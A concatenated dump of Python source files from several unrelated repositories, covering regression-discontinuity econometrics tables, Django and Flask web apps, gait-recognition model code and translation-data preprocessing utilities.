table['(6)'] = [rslt6.beta['esas1'], rslt6.se['esas1'], rslt6.pt['esas1'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt6.beta['educ2sa'], rslt6.se['educ2sa'], rslt6.pt['educ2sa'],
rslt6.beta['ecs1'], rslt6.se['ecs1'], rslt6.pt['ecs1'],rslt6.N]
table['(7)'] = [rslt7.beta['esas1'], rslt7.se['esas1'], rslt7.pt['esas1'],
rslt7.beta['resa'], rslt7.se['resa'], rslt7.pt['resa'],
rslt7.beta['desa'], rslt7.se['desa'], rslt7.pt['desa'],
rslt7.beta['denssa'], rslt7.se['denssa'], rslt7.pt['denssa'],
rslt7.beta['termssa'], rslt7.se['termssa'], rslt7.pt['termssa'],
rslt7.beta['presssa'], rslt7.se['presssa'], rslt7.pt['presssa'],
rslt7.beta['educ2sa'], rslt7.se['educ2sa'], rslt7.pt['educ2sa'],
rslt7.beta['ecs1'], rslt7.se['ecs1'], rslt7.pt['ecs1'],rslt7.N]
return(table)
##===========================================
## For balance test(discontinuity test) table
##===========================================
def Balance_test(data,bandwidth,confounder,cluster_var):
# calculated optimal bandwidth:
# 2h* = 0.386
# h* = 0.193
# h*/2 = 0.0965
# h*/4 = 0.048
df = data[["debt", "tipo", "vcp", "pob", "density", "pob_mes6591",
"pob_5_1491", "extr_noeu91", "unempl", "income", "presscirc",
"regre", "regde", "meanden", "educ2", "regterm", "ecs1",
"dab", "dist1", "vda", "codiine", "codccaa","cprov",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]]
df_h = df[abs(df.dist1)<bandwidth]
y = confounder
X = ['dab', 'dist1', 'vda', "dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
results = mt.reg(
df_h, # DataFrame
y, # Dependent var (string)
X, # Independent var(s) (string or list of strings)
cluster=cluster_var, # Cluster var (string)
addcons=True
)
return(results)
def Balance_test_table(data):
# set the confounders and corresponding optimal bandwidth
combine = {"debt": 0.219, "tipo":0.171, "vcp":0.216, "pob":0.197, "density":0.171, "pob_mes6591":0.185,
"presscirc":0.253, "regre":0.247, "regde":0.245, "meanden":0.275, "educ2":0.347, "regterm":0.287,
"ecs1":0.247, "pob_5_1491":0.183, "extr_noeu91":0.223, "unempl":0.237, "income":0.229}
temp_i = ["debt", "tipo", "vcp", "pob", "density", "pob_mes6591",
"pob_5_1491", "extr_noeu91", "unempl", "income","presscirc",
"regre", "regde", "meanden", "educ2", "regterm", "ecs1"]
# create a table and temporarily set bandwidth value as index
table = pd.DataFrame({'Variable': [], 'Coef.': [], 'SE': [],
'P-value': [], 'Bandwidth': [], 'Observations': []})
table['Variable'] = temp_i
table = table.set_index('Variable')
# regression and result
for i,j in combine.items():
data = data
confounder = i
bandwidth = j
if j < 0.24:
cluster_var = 'codiine'
elif j == 0.253:
cluster_var = 'cprov'
else:
cluster_var = 'codccaa'
rl = Balance_test(data,bandwidth,confounder,cluster_var)
rg = [rl.beta['dist1'] , rl.se['dist1'], rl.pt['dist1'], j, rl.N]
table.loc[i] = rg
table['Variable'] = ["Debt burden","Property tax rate","Property value","Population",
"Population density","% Old","% Young","% Immigrant","% Unemployed",
"Income indicator","Press circulation p.c.","Regional revenues p.c",
"Regional debt","Municipal density","Education","Tenure in office",
"Regional seat margin"]
return(table)
##===========================================
## Robustness Check
##===========================================
def first_stage_2SLS_order(data,order,bandwidth):
df = data
if bandwidth < 1:
df_h = df[abs(df.dist1)<bandwidth]
elif bandwidth == 1:
df_h = df
y = 'ab'
X = ['dab',"dca2","dca3","dca4","dca5","dca6","dca7","dca8",
"dca9","dca10","dca11","dca12","dca13","dca14","dca15"]
if order == 1:
add = ['dist1','vda']
elif order == 2:
add = ['dist1','dist2','vda','vda2']
elif order == 3:
add = ['dist1','dist2','dist3','vda','vda2','vda3']
X = X + add
results = mt.reg(
df_h, # DataFrame
y, # Dependent var (string)
X, # Independent var(s) (string or list of strings)
cluster='codiine', # Cluster var (string)
addcons=True
)
return(results)
def second_stage_2SLS_global(data,order,bandwidth):
df = data
if bandwidth < 1:
df_h = df[abs(df.dist1)<bandwidth]
elif bandwidth == 1:
df_h = df
y = "tk" # dependent var
E = ["ab"] # endo reg
Z = ["dab"] # instrumental
X = ["dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9",
"dca10","dca11","dca12","dca13","dca14","dca15"] # exo reg
if order == 1:
add_endo = ['vsa']
add_inst = ['vda']
add_exo = ['dist1']
elif order == 2:
add_endo = ['vsa','vsa2']
add_inst = ['vda','vda2']
add_exo = ['dist1','dist2']
elif order == 3:
add_endo = ['vsa','vsa2','vsa3']
add_inst = ['vda','vda2','vda3']
add_exo = ['dist1','dist2','dist3']
E = E + add_endo
Z = Z + add_inst
X = X + add_exo
results = mt.ivreg(df_h, y, E, Z, X, cluster='codiine',addcons=True)
return(results)
def table_Poly_Robust(data,bandwidth):
# construct the table
table = pd.DataFrame({'(1)': [], '(2)': [], '(3)': []})
case = ('Second Stage','Alignment','se(2)',
'p-value(2)','First Stage','Reg vote margin','se(1)',
'p-value(1)','Polynomial Order','Observations')
table[' '] = case
table = table.set_index(' ')
# regression results
subset = subset_for_Poly_Robust(data)
rslt_11 = first_stage_2SLS_order(data=subset,order=1,bandwidth = bandwidth)
rslt_12 = first_stage_2SLS_order(data=subset,order=2,bandwidth= bandwidth)
rslt_13 = first_stage_2SLS_order(data=subset,order=3,bandwidth= bandwidth)
rslt_21 = second_stage_2SLS_global(data=subset,order=1,bandwidth= bandwidth)
rslt_22 = second_stage_2SLS_global(data=subset,order=2,bandwidth= bandwidth)
rslt_23 = second_stage_2SLS_global(data=subset,order=3,bandwidth= bandwidth)
#fill the table with the contents
table['(1)'] = [' ', rslt_21.beta['ab'],rslt_21.se['ab'],rslt_21.pt['ab'],
' ',rslt_11.beta['dab'],rslt_11.se['dab'],rslt_11.pt['dab'],'1',rslt_11.N]
table['(2)'] = [' ', rslt_22.beta['ab'],rslt_22.se['ab'],rslt_22.pt['ab'],
' ',rslt_12.beta['dab'],rslt_12.se['dab'],rslt_12.pt['dab'],'2',rslt_12.N]
table['(3)'] = [' ', rslt_23.beta['ab'],rslt_23.se['ab'],rslt_23.pt['ab'],
' ',rslt_13.beta['dab'],rslt_13.se['dab'],rslt_13.pt['dab'],'3',rslt_13.N]
return(table)
def robust_bandwidth_LATE(data):
table = pd.DataFrame({'2nd_stage': [], 'Std.err(2)': [], 'P-Value(2)': [],
'1st_stage': [], 'Std.err(1)': [], 'P-Value(1)': [],
'Observations': []})
case = (0.11,0.13,0.15,0.17,0.193,0.21,0.23,0.25,0.27,0.29)
table['Bandwidth'] = case
table = table.set_index('Bandwidth')
#Local
for i in case:
bandwidth = i
rslt1 = first_stage_2SLS_local(data,bandwidth = bandwidth,cluster_var = "codiine",covariates = 0)
rslt2 = second_stage_2SLS_local(data, bandwidth = bandwidth,cluster_var = "codiine",covariates = 0)
result = [rslt2.beta['ab'] , rslt2.se['ab'], rslt2.pt['ab'],
rslt1.beta['dab'], rslt1.se['dab'], rslt1.pt['dab'], rslt2.N]
table.loc[i] = result
return (table)
def robust_bandwidth_HLATE(data):
table = pd.DataFrame({'Alignment * RSM': [], 'Std.err(2)': [], 'P-Value(2)': [],
'RSM': [], 'Std.err(1)': [], 'P-Value(1)': [],
'Observations': []})
case = (0.11,0.13,0.15,0.17,0.193,0.21,0.23,0.25,0.27,0.29,0.31,0.33,0.35,0.386,0.4)
table['Bandwidth'] = case
table = table.set_index('Bandwidth')
#Local
for i in case:
bandwidth = i
rslt1 = effect_of_competition_local(data,bandwidth = bandwidth)
result = [rslt1.beta['esas1'] , rslt1.se['esas1'], rslt1.pt['esas1'],
rslt1.beta['ecs1'], rslt1.se['ecs1'], rslt1.pt['ecs1'],rslt1.N]
table.loc[i] = result
return (table)
def LATE_for_alternative_align(data,bandwidth,endo,cluster_var):
"""
Compare LATE obtained by different alternative dummy variables which represent
more comprehensible alignement status
"""
df = subset_for_alternative_align(data) # Generate subset
df = df.dropna()
df_h = df[abs(df.dist1)<bandwidth] # Set optimal bandwidth
"""
Take the result of the second stage of Instrument Regression
"""
y = "tk" # dependent var
E = endo # endo reg
Z = ["dab","vda"] # instrumental
X = ["dist1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def HLATE_for_alternative_align(data, bandwidth, alter):
"""
Compare HLATE obtained by different alternative dummy variables which represent
more comprehensible alignement status
"""
# add regional fixed effects as controls
dca_bcdi = []
dca_vsbcdi = []
dca_bloci = []
dca_vsbloci = []
dca_dabi = []
dca_vdai = []
for i in range(1,16):
dca_bcdi.append("dca_bcd"+str(i))
dca_vsbcdi.append("dca_vsbcd"+str(i))
dca_bloci.append("dca_bloc"+str(i))
dca_vsbloci.append("dca_vsbloc"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
regional_columns = dca_bcdi + dca_vsbcdi + dca_bloci + dca_vsbloci + dca_dabi + dca_vdai
rc = data[regional_columns]
oc = subset_for_alternative_align(data)
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
df = df.dropna()
df_h = df[abs(df.dist1)<bandwidth]
# put different endogenous variables to different alternative regression model
if alter == 'part':
E = dca_bcdi + dca_vsbcdi + ["esas1_bis","vsbcd_ecs1"]
elif alter == 'bloc':
E = dca_bloci + dca_vsbloci + ["esas1_bisbis", "vsbloc_ecs1" ]
y = 'tk'
Z = dca_dabi + dca_vdai + ["edas1", "vda_ecs1"]
X = ["dist1_ecs1","dist1","ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
cluster_var = 'codccaa'
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def table_alternative_alignment(data, data2):
table = pd.DataFrame({'LATE': [], 'SE(1)': [], 'P-val(1)': [],
'HLATE(Align*RSM)': [], 'SE(2)': [], 'P-val(2)': [],
'RSM': [], 'SE(3)': [], 'P-val(3)': [], 'Bandwidth':[],
'Obs' : []})
case = ('Alignment','Partner-Align','Bloc-Align')
table['RD'] = case
table = table.set_index('RD')
# The First row shows the estimates of original alignment dummy
align1 = second_stage_2SLS_local(data, bandwidth = 0.193, cluster_var = "codiine", covariates = 0)
align2 = effect_of_competition_local(data2, bandwidth = 0.193)
result_align = [align1.beta['ab'] , align1.se['ab'], align1.pt['ab'],
align2.beta['esas1'], align2.se['esas1'], align2.pt['esas1'],
align2.beta['ecs1'], align2.se['ecs1'], align2.pt['ecs1'], 0.193, align2.N]
table.loc['Alignment'] = result_align
# The second row shows the estimates of partner-alignment dummy
part1 = LATE_for_alternative_align(data,bandwidth = 0.225 ,endo = ['abcd', 'vsbcd'],cluster_var = 'codiine')
part2 = HLATE_for_alternative_align(data,bandwidth = 0.225, alter = 'part')
result_part = [part1.beta['abcd'] , part1.se['abcd'], part1.pt['abcd'],
part2.beta['esas1_bis'], part2.se['esas1_bis'], part2.pt['esas1_bis'],
part2.beta['ecs1'], part2.se['ecs1'], part2.pt['ecs1'], 0.225, part2.N]
table.loc['Partner-Align'] = result_part
# The third row shows the estimates of bloc-alignment dummy
bloc1 = LATE_for_alternative_align(data,bandwidth = 0.219 ,endo = ['bloc', 'vsbloc'],cluster_var = 'codiine')
bloc2 = HLATE_for_alternative_align(data,bandwidth = 0.219, alter = 'bloc')
result_bloc = [bloc1.beta['bloc'] , bloc1.se['bloc'], bloc1.pt['bloc'],
bloc2.beta['esas1_bisbis'], bloc2.se['esas1_bisbis'], bloc2.pt['esas1_bisbis'],
bloc2.beta['ecs1'], bloc2.se['ecs1'], bloc2.pt['ecs1'], 0.219, bloc2.N]
table.loc['Bloc-Align'] = result_bloc
return table
``` |
{
"source": "jinka/Inst-Photo-App",
"score": 2
} |
#### File: Inst-Photo-App/insta/models.py
```python
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
class Image(models.Model):
image=models.ImageField(upload_to = '')
name=models.CharField(max_length=100)
caption=models.CharField(max_length=100)
date_created=models.DateTimeField(default=timezone.now)
likes=models.IntegerField(default=0)
user = models.ForeignKey(User, on_delete=models.CASCADE)
class Meta:
ordering = ['name']
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('insta-detail',kwargs={'pk': self.pk})
def save_image(self):
self.save()
def delete_image(self):
self.delete()
@classmethod
def update_caption(cls, id, description):
cls.objects.filter(id=id).update(caption = caption)
```
#### File: Inst-Photo-App/users/views.py
```python
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
from insta.models import Image
from decouple import config
from django.core.mail import send_mail
from django.conf import settings
def email(request):
pass
return redirect('redirect to a new page')
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
subject = 'Thank you for registering to our site'
message = ' it means a world to us '
email_from = settings.EMAIL_HOST_USER
recipient_list = ['<EMAIL>',settings.EMAIL_HOST_USER]
send_mail( subject, message, email_from, recipient_list )
messages.success(request, f'Your account has been created! You are now able to log in')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
current_user = request.user
images = Image.objects.filter(user = current_user)
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your account has been updated!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form,
'images': images
}
return render(request, 'users/profile.html', context)
``` |
{
"source": "JinkaiZheng/TraND",
"score": 3
} |
#### File: model/network/basic_blocks.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, **kwargs):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, bias=False, **kwargs)
def forward(self, x):
x = self.conv(x)
return F.leaky_relu(x, inplace=True)
class SetBlock(nn.Module):
def __init__(self, forward_block, pooling=False):
super(SetBlock, self).__init__()
self.forward_block = forward_block
self.pooling = pooling
if pooling:
self.pool2d = nn.MaxPool2d(2)
def forward(self, x):
n, s, c, h, w = x.size()
x = self.forward_block(x.view(-1,c,h,w))
if self.pooling:
x = self.pool2d(x)
_, c, h, w = x.size()
return x.view(n, s, c, h ,w)
class HPM(nn.Module):
def __init__(self, in_dim, out_dim, bin_level_num=5):
super(HPM, self).__init__()
self.bin_num = [2**i for i in range(bin_level_num)]
self.fc_bin = nn.ParameterList([
nn.Parameter(
nn.init.xavier_uniform(
torch.zeros(sum(self.bin_num), in_dim, out_dim)))])
def forward(self, x):
feature = list()
n, c, h, w = x.size()
for num_bin in self.bin_num:
z = x.view(n, c, num_bin, -1)
z = z.mean(3)+z.max(3)[0]
feature.append(z)
feature = torch.cat(feature, 2).permute(2, 0, 1).contiguous()
feature = feature.matmul(self.fc_bin[0])
return feature.permute(1, 0, 2).contiguous()
```
#### File: model/utils/data_set.py
```python
import torch.utils.data as tordata
import numpy as np
import os.path as osp
import os
import cv2
import xarray as xr
class DataSet(tordata.Dataset):
def __init__(self, seq_dir, label, seq_type, view, cache, resolution):
self.seq_dir = seq_dir
self.view = view
self.seq_type = seq_type
self.label = label
self.cache = cache
self.resolution = int(resolution)
self.cut_padding = int(float(resolution)/64*10)
self.data_size = len(self.label)
self.data = [None] * self.data_size
self.frame_set = [None] * self.data_size
self.label_set = set(self.label)
self.seq_type_set = set(self.seq_type)
self.view_set = set(self.view)
_ = np.zeros((len(self.label_set),
len(self.seq_type_set),
len(self.view_set))).astype('int')
_ -= 1
self.index_dict = xr.DataArray(
_,
coords={'label': sorted(list(self.label_set)),
'seq_type': sorted(list(self.seq_type_set)),
'view': sorted(list(self.view_set))},
dims=['label', 'seq_type', 'view'])
for i in range(self.data_size):
_label = self.label[i]
_seq_type = self.seq_type[i]
_view = self.view[i]
self.index_dict.loc[_label, _seq_type, _view] = i
def load_all_data(self):
for i in range(self.data_size):
self.load_data(i)
def load_data(self, index):
return self.__getitem__(index)
def __loader__(self, path):
return self.img2xarray(
path)[:, :, self.cut_padding:-self.cut_padding].astype(
'float32') / 255.0
def __getitem__(self, index):
# pose sequence sampling
if not self.cache:
data = [self.__loader__(_path) for _path in self.seq_dir[index]]
frame_set = [set(feature.coords['frame'].values.tolist()) for feature in data]
frame_set = list(set.intersection(*frame_set))
elif self.data[index] is None:
data = [self.__loader__(_path) for _path in self.seq_dir[index]]
frame_set = [set(feature.coords['frame'].values.tolist()) for feature in data]
frame_set = list(set.intersection(*frame_set))
self.data[index] = data
self.frame_set[index] = frame_set
else:
data = self.data[index]
frame_set = self.frame_set[index]
return data, frame_set, self.view[index], self.seq_type[index], self.label[index], index
def img2xarray(self, flie_path):
imgs = sorted(list(os.listdir(flie_path)))
frame_list = [np.reshape(
cv2.imread(osp.join(flie_path, _img_path)),
[self.resolution, self.resolution, -1])[:, :, 0]
for _img_path in imgs
if osp.isfile(osp.join(flie_path, _img_path))]
num_list = list(range(len(frame_list)))
data_dict = xr.DataArray(
frame_list,
coords={'frame': num_list},
dims=['frame', 'img_y', 'img_x'],
)
return data_dict
def __len__(self):
return len(self.label)
```
#### File: TraND/GaitSet/test.py
```python
from datetime import datetime
import numpy as np
import argparse
from model.initialization import initialization
from model.utils import evaluation
from config import conf_CASIA, conf_OULP
def boolean_string(s):
if s.upper() not in {'FALSE', 'TRUE'}:
raise ValueError('Not a valid boolean string')
return s.upper() == 'TRUE'
parser = argparse.ArgumentParser(description='Test')
parser.add_argument('--data', default='casia-b', type=str,
help='dataset to be used. (default: casia-b)')
parser.add_argument('--iter', default='100000', type=int,
help='iter: iteration of the checkpoint to load. Default: 80000')
parser.add_argument('--batch_size', default='64', type=int,
help='batch_size: batch size for parallel test. Default: 64')
parser.add_argument('--cache', default=False, type=boolean_string,
help='cache: if set as TRUE all the test data will be loaded at once'
' before the transforming start. Default: FALSE')
opt = parser.parse_args()
# Exclude identical-view cases
def de_diag(acc, each_angle=False):
result = np.sum(acc - np.diag(np.diag(acc)), 1)
result = result / (result.shape[0]-1.0)
if not each_angle:
result = np.mean(result)
return result
if opt.data == "casia-b":
conf = conf_CASIA
elif opt.data == "oulp":
conf = conf_OULP
else:
raise Warning("Please check your dataset_name, current dataset is not casia-b or oulp.")
m = initialization(conf, test=opt.cache)[0]
# load model checkpoint of iteration opt.iter
print('Loading the model of iteration %d...' % opt.iter)
m.load(opt.iter)
print('Transforming...')
time = datetime.now()
test = m.transform('test', opt.batch_size)
print('Evaluating...')
acc = evaluation(test, conf['data'])
print('Evaluation complete. Cost:', datetime.now() - time)
if acc.shape[0] == 3:
for i in range(1):
print('===Rank-%d (Include identical-view cases) on the CASIA-B dataset===' % (i + 1))
print('NM: %.3f,\tBG: %.3f,\tCL: %.3f' % (
np.mean(acc[0, :, :, i]),
np.mean(acc[1, :, :, i]),
np.mean(acc[2, :, :, i])))
for i in range(1):
print('===Rank-%d (Exclude identical-view cases) on the CASIA-B dataset===' % (i + 1))
print('NM: %.3f,\tBG: %.3f,\tCL: %.3f' % (
de_diag(acc[0, :, :, i]),
de_diag(acc[1, :, :, i]),
de_diag(acc[2, :, :, i])))
np.set_printoptions(precision=2, floatmode='fixed')
for i in range(1):
print('===Rank-%d of each angle (Exclude identical-view cases) on the CASIA-B dataset===' % (i + 1))
print('NM:', de_diag(acc[0, :, :, i], True))
print('BG:', de_diag(acc[1, :, :, i], True))
print('CL:', de_diag(acc[2, :, :, i], True))
elif acc.shape[0] == 1:
for i in range(1):
print('===Rank-%d (Include identical-view cases) on the OULP dataset===' % (i + 1))
print('NM: %.3f' % (
np.mean(acc[0, :, :, i])))
for i in range(1):
print('===Rank-%d (Exclude identical-view cases) on the OULP dataset===' % (i + 1))
print('NM: %.3f' % (
de_diag(acc[0, :, :, i])))
np.set_printoptions(precision=2, floatmode='fixed')
for i in range(1):
print('===Rank-%d of each angle (Exclude identical-view cases) on the OULP dataset===' % (i + 1))
print('NM:', de_diag(acc[0, :, :, i], True))
```
#### File: JinkaiZheng/TraND/logger.py
```python
import logging
import os
from configs import parser_argument
cfg = parser_argument()
class Logger:
def __init__(self, name=__name__):
self.__name = name
self.logger = logging.getLogger(self.__name)
self.logger.setLevel(logging.DEBUG)
log_path = os.path.join('outputs/TraND', cfg.log_name)
if not os.path.exists(log_path): os.makedirs(log_path)
logname = log_path + '/' + cfg.log_name + '.log'
fh = logging.FileHandler(logname, mode='w', encoding='utf-8')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
self.logger.addHandler(fh)
self.logger.addHandler(ch)
@property
def get_log(self):
return self.logger
log = Logger(__name__).get_log
``` |
{
"source": "jinka/like_awwards",
"score": 2
} |
#### File: like_awwards/awwardsapp/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
import datetime as dt
from django.utils import timezone
from django.urls import reverse
from PIL import Image
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(default='default.jpg',upload_to='profile_pics')
bio = models.TextField(max_length=100, blank=True)
contact = models.TextField(max_length=100, blank=True)
# votes = models.IntegerField(default = 0)
def __str__(self):
return f'{self.user.username} Profile'
def save(self, **kwargs):
super().save()
@classmethod
def filter_by_id(cls, id):
details = Profile.objects.filter(user = id).first()
return details
class Project(models.Model):
image = models.ImageField(upload_to = 'images/')
title = models.CharField(max_length =100)
url = models.CharField(max_length =80)
detail_desciption=models.TextField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('project-detail', kwargs={'pk': self.pk})
class Meta:
ordering = ['-pk']
def save_project(self):
self.save()
@classmethod
def search_by_projectname(cls,idea):
projects = cls.objects.filter(title__icontains=idea)
return projects
class Rate(models.Model):
pass
# design = models.IntegerField()
# usability = models.IntegerField()
# creativity = models.IntegerField()
# def __str__(self):
# return self.design
# class Meta:
# ordering = ['-id']
# def save_rate(self):
# self.save()
# @classmethod
# def get_rate(cls, profile):
# rate = Rate.objects.filter(Profile__pk = profile)
# return rate
# @classmethod
# def get_all_rating(cls):
# rating = Rate.objects.all()
# return rating
``` |
{
"source": "jinka/News-Highligh",
"score": 3
} |
#### File: app/main/views.py
```python
from flask import render_template,request,redirect,url_for
from . import main
# from app import app
from ..request import get_sources,get_articles,search_article
from ..models import Sources
# Views
@main.route('/')
def index():
'''
view root page function that returns the index the page and its data
'''
sources = get_sources('business')
sports_sources = get_sources('sports')
technology_sources = get_sources('technology')
entertainment_sources = get_sources('entertainment')
title = "News Highlighter"
search_movie = request.args.get('movie_query')
if search_movie:
return redirect(url_for('.search',movie_name=search_movie))
else:
return render_template('index.html',title = title, sources = sources,sports_sources = sports_sources,technology_sources = technology_sources,entertainment_sources = entertainment_sources)
@main.route('/sources/<id>')
def articles(id):
'''
view articles page
'''
articles = get_articles(id)
title = f'NH | {id}'
return render_template('articles.html',title= title,articles = articles)
@main.route('/search/<movie_name>')
def search(movie_name):
'''
View function to display the search results
'''
article_name_list = movie_name.split(" ")
article_name_format = "+".join(article_name_list)
searched_articles = search_article(article_name_format)
title = f'search results for {movie_name}'
return render_template('search.html',articles = searched_articles)
``` |
{
"source": "jinkanhq/ningen",
"score": 2
} |
#### File: interview/templatetags/markdown.py
```python
from django import template
from django.utils.safestring import mark_safe
from ningen.interview.utils import ningen_markdown as md
register = template.Library()
@register.filter
def markdown(value):
return mark_safe(md.convert(value))
```
#### File: ningen/interview/utils.py
```python
import markdown as md
from markdown.extensions import Extension
from markdown.inlinepatterns import Pattern
from markdown.util import etree
from ningen.interview.models import Item
# 老式链接 [Item Name][item-slug]
OLD_ITEM_LINK_RE = r'\[([^\[\]\(\)]+)\]\[([^\[\]\(\)]+)\]'
# 新式链接 [[item-slug]]
ITEM_LINK_RE = r'\[\[([a-z0-9\-^\[\]\(\)]+)\]\]'
class OldItemLinkPattern(Pattern):
def handleMatch(self, m):
el = etree.Element("a")
item_slug = m.group(3)
item_name = m.group(2)
el.set('target', '_blank')
el.set('class', 'item')
el.text = item_name
try:
item = Item.objects.get(slug=item_slug)
el.set("href", item.link)
el.set("title", item.get_full_name())
except Item.DoesNotExist:
Item.objects.create(
slug=item_slug, name=item_name, vendor='Unknown',
description='(Markdown generated)', link='javascript:;')
el.set("href", "#")
return el
class ItemLinkPattern(Pattern):
def handleMatch(self, m):
el = etree.Element("a")
el.set('target', '_blank')
el.set('class', 'item')
item_slug = m.group(2)
try:
item = Item.objects.get(slug=item_slug)
el.text = item.get_full_name()
el.set("href", item.link)
el.set("title", item.get_full_name())
except Item.DoesNotExist:
Item.objects.create(
slug=item_slug, name=item_slug, vendor='Unknown',
description='(Markdown generated)', link='javascript:;')
el.set("href", "#")
return el
class NingenExtension(Extension):
def extendMarkdown(self, md, md_globals):
md.inlinePatterns.add(
'itemlink_old', OldItemLinkPattern(OLD_ITEM_LINK_RE, md), '<reference')
md.inlinePatterns.add(
'itemlink', ItemLinkPattern(ITEM_LINK_RE, md), '<reference'
)
ningen_markdown = md.Markdown(extensions=[NingenExtension()])
``` |
{
"source": "jinka/One-Minute_Pitch",
"score": 2
} |
#### File: migrations/versions/ba2c8c2959e3_initial_migration.py
```python
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = 'ba2c8c2959e3'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('comments')
op.drop_table('pitches')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('pitches',
sa.Column('id', sa.INTEGER(), server_default=sa.text("nextval('pitches_id_seq'::regclass)"), autoincrement=True, nullable=False),
sa.Column('pitch_title', sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column('posted', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),
sa.Column('author', sa.INTEGER(), autoincrement=False, nullable=True),
sa.Column('category', sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column('content', sa.VARCHAR(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['author'], ['users.id'], name='pitches_author_fkey'),
sa.PrimaryKeyConstraint('id', name='pitches_pkey'),
postgresql_ignore_search_path=False
)
op.create_table('comments',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('comment_content', sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True),
sa.Column('pitch_id', sa.INTEGER(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], name='comments_pitch_id_fkey'),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], name='comments_user_id_fkey'),
sa.PrimaryKeyConstraint('id', name='comments_pkey')
)
# ### end Alembic commands ###
``` |
{
"source": "JINKEHE/VitalSpider",
"score": 3
} |
#### File: VitalSpider/tutorial/mydownloader.py
```python
import subprocess
import scrapy
class MyDownloader(object):
def process_request(self, request, spider):
if request.url.endswith(".zip"):
subprocess.Popen(["wget", request.url, "-P", "~/temp"])
return scrapy.http.HtmlResponse(url="", body="", encoding='utf8')
``` |
{
"source": "JinkelaCrops/t2t-learning",
"score": 3
} |
#### File: t2t-learning/mytrain/my_unpack.py
```python
from processutils.textfilter import Unpack
from utils.simplelog import Logger
import argparse
parser = argparse.ArgumentParser(description="my_unpack")
parser.add_argument('-f', "--file_prefix", required=True)
parser.add_argument('-sep', "--separator", required=True)
# args = parser.parse_args([
# "-f", "../test/medicine.sample.data/data.test",
# "-sep", ' ||| '
# ])
args = parser.parse_args()
args.output_src = args.file_prefix + ".src"
args.output_tgt = args.file_prefix + ".tgt"
log = Logger("my_filter", "my_filter.log").log()
def main(data):
unpack = Unpack(args.separator)
src_lines = []
tgt_lines = []
for k, line in enumerate(data):
try:
src, tgt, change_order = unpack.unpack(line)
except Exception as e:
log.error(f"unpack error: {e.__class__}, {e.__context__}, ### {line.strip()}")
continue
src_lines.append(src + "\n")
tgt_lines.append(tgt + "\n")
return src_lines, tgt_lines
if __name__ == '__main__':
with open(args.file_prefix, "r", encoding="utf8") as f:
data = f.readlines()
src_lines, tgt_lines = main(data)
with open(args.output_src, "w", encoding="utf8") as f:
f.writelines(src_lines)
with open(args.output_tgt, "w", encoding="utf8") as f:
f.writelines(tgt_lines)
```
#### File: t2t-learning/processutils/analyze_dev.py
```python
import re
from processutils.regexutils import pattern_find_pts
from processutils.regexutils import mask_update
class Field(object):
def __init__(self, line):
self.line = line
self.mask = [0] * len(self.line)
class Rule(object):
def __init__(self):
self.id = 0
self.desc = "This is a rule"
self.level = 0
self.regex = ""
def process(self, field: Field):
output = None
if self.regex:
output = pattern_find_pts(self.regex, field.line, mask=field.mask)
mask_update(field.mask, output)
return output
class Check(object):
pass
class Modify(object):
def __init__(self):
pass
class Link(Rule):
def __init__(self):
super().__init__()
